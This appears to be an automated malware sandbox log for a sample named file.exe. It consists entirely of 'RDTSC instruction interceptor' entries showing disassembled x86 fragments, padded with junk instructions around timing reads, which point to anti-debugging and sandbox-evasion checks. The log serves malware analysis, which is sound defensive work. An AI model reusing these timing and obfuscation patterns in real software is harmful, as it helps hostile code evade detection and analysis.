Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502906 second address: 50290A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5029CD second address: 502A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8B14C5BAA2h 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jo 00007F8B14C5BA9Ah 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [eax] 0x00000023 ja 00007F8B14C5BAA0h 0x00000029 pushad 0x0000002a jng 00007F8B14C5BA96h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a jmp 00007F8B14C5BAA0h 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502C19 second address: 502C96 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F8B146BE726h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F8B146BE718h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c js 00007F8B146BE72Eh 0x00000032 jmp 00007F8B146BE728h 0x00000037 push 00000004h 0x00000039 mov dword ptr [ebp+122D26A5h], ecx 0x0000003f push eax 0x00000040 pushad 0x00000041 push ebx 0x00000042 jmp 00007F8B146BE71Dh 0x00000047 pop ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50306A second address: 50306E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5031BA second address: 5031D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B146BE722h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F2BB second address: 52F2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F2BF second address: 52F2E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8B146BE71Eh 0x00000010 jmp 00007F8B146BE71Ah 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F2E5 second address: 52F2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8B14C5BA96h 0x00000009 jne 00007F8B14C5BA96h 0x0000000f popad 0x00000010 jng 00007F8B14C5BA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F5C2 second address: 52F604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE727h 0x00000007 jmp 00007F8B146BE728h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8B146BE71Bh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F604 second address: 52F612 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B14C5BA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F78E second address: 52F792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F792 second address: 52F796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F8FE second address: 52F905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F905 second address: 52F923 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B14C5BA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 je 00007F8B14C5BA96h 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FA78 second address: 52FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FA7C second address: 52FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FA80 second address: 52FA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FD33 second address: 52FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5356F6 second address: 535714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE724h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535714 second address: 53571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53571A second address: 53571E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53571E second address: 535736 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8B14C5BA9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5358CB second address: 5358CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5358CF second address: 5358EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8B14C5BA9Bh 0x0000000e jo 00007F8B14C5BA96h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5358EC second address: 535919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146BE729h 0x00000008 jo 00007F8B146BE716h 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535919 second address: 53591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535D5B second address: 535D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BE71Fh 0x00000009 ja 00007F8B146BE716h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53542F second address: 535435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535435 second address: 53543F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B146BE716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53543F second address: 535443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5361CF second address: 5361D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536321 second address: 536325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536325 second address: 53634F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F8B146BE721h 0x0000000e jmp 00007F8B146BE71Bh 0x00000013 push esi 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F8B146BE716h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53634F second address: 536353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536353 second address: 536357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539EBF second address: 539EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539EC3 second address: 539ED1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539ED1 second address: 539ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79AC second address: 4B79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79B0 second address: 4B79B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B496 second address: 53B4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE71Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B4A6 second address: 53B4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0C90 second address: 4B0CA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8B146BE71Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0CA2 second address: 4B0CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8B14C5BAAAh 0x0000000a jmp 00007F8B14C5BAA2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E40F second address: 53E43D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8B146BE716h 0x00000008 ja 00007F8B146BE716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F8B146BE729h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544282 second address: 544286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544286 second address: 54428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54428C second address: 544291 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542E12 second address: 542E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542F7C second address: 542F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F8B14C5BA9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542F94 second address: 542F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54311A second address: 543120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54328D second address: 543297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8B146BE716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54354D second address: 543561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B14C5BA9Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 543561 second address: 54357C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F8B146BE730h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F8B146BE716h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54357C second address: 543582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5436E2 second address: 5436E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5436E8 second address: 5436EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 543846 second address: 54384A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5473EE second address: 54740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8B151F0E3Ch 0x0000000b jmp 00007F8B151F0E3Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54740F second address: 547428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8B146C0A0Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547428 second address: 54742D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54742D second address: 547433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A4F8 second address: 54A519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007F8B151F0E48h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A519 second address: 54A553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A18h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8B146C0A0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F8B146C0A06h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A553 second address: 54A563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54DC05 second address: 54DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54DC09 second address: 54DC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54DC0D second address: 54DC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5524B5 second address: 5524E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8B151F0E40h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5524E0 second address: 552503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A13h 0x00000007 jmp 00007F8B146C0A0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552503 second address: 552524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jne 00007F8B151F0E38h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F8B151F0E36h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551E39 second address: 551E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8B146C0A06h 0x0000000a popad 0x0000000b jmp 00007F8B146C0A0Fh 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551E58 second address: 551E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007F8B151F0E42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551E67 second address: 551E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5567E6 second address: 556800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556800 second address: 55681A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8B146C0A10h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55681A second address: 55681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55681E second address: 556824 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556824 second address: 55682A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55682A second address: 55682E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55682E second address: 556832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556832 second address: 556851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146C0A10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F8B146C0A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556851 second address: 556864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8B151F0E36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556864 second address: 556871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F8B146C0A06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 556871 second address: 556880 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F8B151F0E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555B25 second address: 555B2B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555B2B second address: 555B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8B151F0E43h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8B151F0E43h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F8B151F0E44h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555B72 second address: 555B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555CD3 second address: 555CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555E69 second address: 555E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5560E1 second address: 5560E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55639D second address: 5563A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8B146C0A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5563A7 second address: 5563EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8B151F0E49h 0x0000000f jmp 00007F8B151F0E47h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5563EA second address: 5563F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C79D second address: 55C7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7A1 second address: 55C7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007F8B146C0A06h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7AF second address: 55C7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
